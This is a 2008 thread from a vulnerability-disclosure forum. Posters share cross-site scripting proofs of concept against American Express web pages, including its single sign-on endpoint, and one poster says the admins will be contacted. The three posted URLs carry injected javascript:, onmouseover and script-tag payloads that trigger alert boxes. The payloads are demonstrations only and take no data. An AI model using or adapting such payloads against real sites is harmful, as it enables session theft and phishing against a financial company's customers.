AmericanExpress XSSs

sla.ckers.org is
ha.ckers sla.cking

Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

AmericanExpress XSSs

Posted by: C1c4Tr1Z

Date: August 04, 2008 09:37PM

Well, I think this is very (but very!) dangerous if you know how to use it.

https://www01.extra.americanexpress.com/Initial.aspx?target=javascript:alert(%22C1c4Tr1Z%22)%27/onmouseover=alert(%22C1c4Tr1Z%22);foo=%27

https://sso.americanexpress.com/SSO/request?request_type=un_createid&ssobrand=&ssolang=en_US&REALMOID=06-3dcadafa-92e6-0028-0000-151f0000151f&SSOURL=%22%0B+onmouseover=alert(/XSS/)+foo=%22&VALUE=abc (I love SSL)

I will contact the admins.

Quote

American Express takes your privacy very seriously.

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: Reply•Quote

Re: AmericanExpress XSSs

Posted by: Kyo

Date: August 05, 2008 12:12AM

ooooh, nice one.

Options: Reply•Quote

Re: AmericanExpress XSSs

Posted by: TheInsider

Date: December 24, 2008 07:52PM

Yes, quite nice!
However, they patched it, but it took me a moment to find a new one also in HTTPS :)

https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!